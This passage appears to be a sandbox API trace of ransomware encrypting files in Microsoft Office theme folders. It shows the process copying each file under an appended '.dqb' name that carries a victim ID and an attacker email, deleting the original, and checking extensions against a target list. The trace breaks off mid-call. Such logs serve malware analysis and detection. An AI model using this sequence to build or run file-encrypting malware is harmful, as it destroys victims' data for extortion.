[0043.528] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0043.767] GetLastError () returned 0x0 [0043.767] ReadFile (in: hFile=0x1a8, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x74e5, lpOverlapped=0x0) returned 1 [0043.769] WriteFile (in: hFile=0x174, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x74f0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x74f0, lpOverlapped=0x0) returned 1 [0043.770] ReadFile (in: hFile=0x1a8, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.770] WriteFile (in: hFile=0x174, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.770] SetEndOfFile (hFile=0x174) returned 1 [0043.770] CloseHandle (hObject=0x174) returned 1 [0043.770] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.770] SetEndOfFile (hFile=0x1a8) returned 1 [0043.771] CloseHandle (hObject=0x1a8) returned 1 [0043.771] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.772] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\capsules\\thmbnail.png")) returned 1 [0043.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0043.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0043.772] lstrlenW (lpString=".doc") returned 4 [0043.772] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.772] lstrlenW (lpString=".docx") returned 5 [0043.772] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.772] lstrlenW (lpString=".pdf") returned 4 [0043.772] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.772] lstrlenW (lpString=".xls") returned 4 [0043.772] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.772] lstrlenW (lpString=".xlsx") returned 5 [0043.772] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.772] lstrlenW (lpString=".ppt") returned 4 [0043.772] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0043.772] lstrlenW (lpString=".zip") returned 4 [0043.772] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.772] lstrlenW (lpString=".rar") returned 4 [0043.772] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.772] lstrlenW (lpString=".bz2") returned 4 [0043.772] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.772] lstrlenW (lpString=".7z") returned 3 [0043.772] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0043.772] lstrlenW (lpString=".dbf") returned 4 [0043.772] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.772] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0043.772] lstrlenW (lpString=".1cd") returned 4 [0043.772] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0043.773] lstrlenW (lpString=".jpg") returned 4 [0043.773] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0043.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0043.773] lstrlenW (lpString=".doc") returned 4 [0043.773] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.773] lstrlenW (lpString=".docx") returned 5 [0043.773] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.773] lstrlenW (lpString=".pdf") returned 4 [0043.773] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.773] lstrlenW (lpString=".xls") returned 4 [0043.773] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.773] lstrlenW (lpString=".xlsx") returned 5 [0043.773] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.773] lstrlenW (lpString=".ppt") returned 4 [0043.773] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0043.773] lstrlenW (lpString=".zip") returned 4 [0043.773] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.773] lstrlenW (lpString=".rar") returned 4 [0043.773] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.773] lstrlenW (lpString=".bz2") returned 4 [0043.773] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.773] lstrlenW (lpString=".7z") returned 3 [0043.773] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0043.773] lstrlenW (lpString=".dbf") returned 4 [0043.773] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0043.773] lstrlenW (lpString=".1cd") returned 4 [0043.773] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.773] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CAPSULES\\THMBNAIL.PNG") returned 77 [0043.773] lstrlenW (lpString=".jpg") returned 4 [0043.774] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.774] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0043.774] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.774] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=25106) returned 1 [0043.774] CloseHandle (hObject=0x1a8) returned 1 [0043.774] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png")) returned 0x20 [0043.774] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0043.774] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.774] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0043.775] GetLastError () returned 0x0 [0043.775] ReadFile (in: hFile=0x1a8, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x6212, lpOverlapped=0x0) returned 1 [0043.776] WriteFile (in: hFile=0x174, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x6220, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x6220, lpOverlapped=0x0) returned 1 [0043.777] ReadFile (in: hFile=0x1a8, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.777] WriteFile (in: hFile=0x174, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.778] SetEndOfFile (hFile=0x174) returned 1 [0043.778] CloseHandle (hObject=0x174) returned 1 [0043.778] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.778] SetEndOfFile (hFile=0x1a8) returned 1 [0043.779] CloseHandle (hObject=0x1a8) returned 1 [0043.779] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.779] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png")) returned 1 [0043.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0043.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0043.779] lstrlenW (lpString=".doc") returned 4 [0043.779] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.779] lstrlenW (lpString=".docx") returned 5 [0043.779] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.779] lstrlenW (lpString=".pdf") returned 4 [0043.779] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.779] lstrlenW (lpString=".xls") returned 4 [0043.779] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.779] lstrlenW (lpString=".xlsx") returned 5 [0043.779] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.779] lstrlenW (lpString=".ppt") returned 4 [0043.779] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.779] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0043.779] lstrlenW (lpString=".zip") returned 4 [0043.779] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.779] lstrlenW (lpString=".rar") returned 4 [0043.779] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.779] lstrlenW (lpString=".bz2") returned 4 [0043.779] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.779] lstrlenW (lpString=".7z") returned 3 [0043.780] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0043.780] lstrlenW (lpString=".dbf") returned 4 [0043.780] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0043.780] lstrlenW (lpString=".1cd") returned 4 [0043.780] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0043.780] lstrlenW (lpString=".jpg") returned 4 [0043.780] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0043.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0043.780] lstrlenW (lpString=".doc") returned 4 [0043.780] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.780] lstrlenW (lpString=".docx") returned 5 [0043.780] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.780] lstrlenW (lpString=".pdf") returned 4 [0043.780] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.780] lstrlenW (lpString=".xls") returned 4 [0043.780] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.780] lstrlenW (lpString=".xlsx") returned 5 [0043.780] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.780] lstrlenW (lpString=".ppt") returned 4 [0043.780] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0043.780] lstrlenW (lpString=".zip") returned 4 [0043.780] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.780] lstrlenW (lpString=".rar") returned 4 [0043.780] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.780] lstrlenW (lpString=".bz2") returned 4 [0043.780] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.780] lstrlenW (lpString=".7z") returned 3 [0043.780] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.780] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0043.780] lstrlenW (lpString=".dbf") returned 4 [0043.781] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0043.781] lstrlenW (lpString=".1cd") returned 4 [0043.781] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.781] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0043.781] lstrlenW (lpString=".jpg") returned 4 [0043.781] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.781] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0043.781] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.781] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0043.782] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=1347) returned 1 [0043.782] CloseHandle (hObject=0x174) returned 1 [0043.782] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif")) returned 0x20 [0043.782] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.782] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0043.782] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.782] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.782] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0043.784] GetLastError () returned 0x0 [0043.784] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x543, lpOverlapped=0x0) returned 1 [0043.785] WriteFile (in: hFile=0x154, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x550, lpOverlapped=0x0) returned 1 [0043.786] ReadFile (in: hFile=0x174, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.786] WriteFile (in: hFile=0x154, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xea, lpOverlapped=0x0) returned 1 [0043.786] SetEndOfFile (hFile=0x154) returned 1 [0043.786] CloseHandle (hObject=0x154) returned 1 [0043.786] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.787] SetEndOfFile (hFile=0x174) returned 1 [0043.787] CloseHandle (hObject=0x174) returned 1 [0043.787] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0043.787] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif")) returned 1 [0043.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0043.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0043.788] lstrlenW (lpString=".doc") returned 4 [0043.788] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.788] lstrlenW (lpString=".docx") returned 5 [0043.788] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.788] lstrlenW (lpString=".pdf") returned 4 [0043.788] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.788] lstrlenW (lpString=".xls") returned 4 [0043.788] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.788] lstrlenW (lpString=".xlsx") returned 5 [0043.788] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.788] lstrlenW (lpString=".ppt") returned 4 [0043.788] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0043.788] lstrlenW (lpString=".zip") returned 4 [0043.788] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.788] lstrlenW (lpString=".rar") returned 4 [0043.788] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.788] lstrlenW (lpString=".bz2") returned 4 [0043.788] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.788] lstrlenW (lpString=".7z") returned 3 [0043.788] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0043.788] lstrlenW (lpString=".dbf") returned 4 [0043.788] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0043.788] lstrlenW (lpString=".1cd") returned 4 [0043.788] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0043.788] lstrlenW (lpString=".jpg") returned 4 [0043.788] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0043.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0043.789] lstrlenW (lpString=".doc") returned 4 [0043.789] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0043.789] lstrlenW (lpString=".docx") returned 5 [0043.789] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0043.789] lstrlenW (lpString=".pdf") returned 4 [0043.789] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0043.789] lstrlenW (lpString=".xls") returned 4 [0043.789] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0043.789] lstrlenW (lpString=".xlsx") returned 5 [0043.789] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0043.789] lstrlenW (lpString=".ppt") returned 4 [0043.789] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0043.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0043.789] lstrlenW (lpString=".zip") returned 4 [0043.789] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0043.789] lstrlenW (lpString=".rar") returned 4 [0043.789] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0043.789] lstrlenW (lpString=".bz2") returned 4 [0043.789] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0043.789] lstrlenW (lpString=".7z") returned 3 [0043.789] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0043.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0043.789] lstrlenW (lpString=".dbf") returned 4 [0043.789] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0043.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0043.789] lstrlenW (lpString=".1cd") returned 4 [0043.789] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0043.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 75 [0043.789] lstrlenW (lpString=".jpg") returned 4 [0043.789] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0043.790] lstrcmpiW (lpString1=".GIF", lpString2=".dqb") returned 1 [0043.790] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0043.790] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c7ff1c | out: lpFileSize=0x2c7ff1c*=1347) returned 1 [0043.790] CloseHandle (hObject=0x174) returned 1 [0043.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif")) returned 0x20 [0043.790] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0043.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\edge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0043.790] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.790] SetFilePointerEx (in: hFile=0x174, 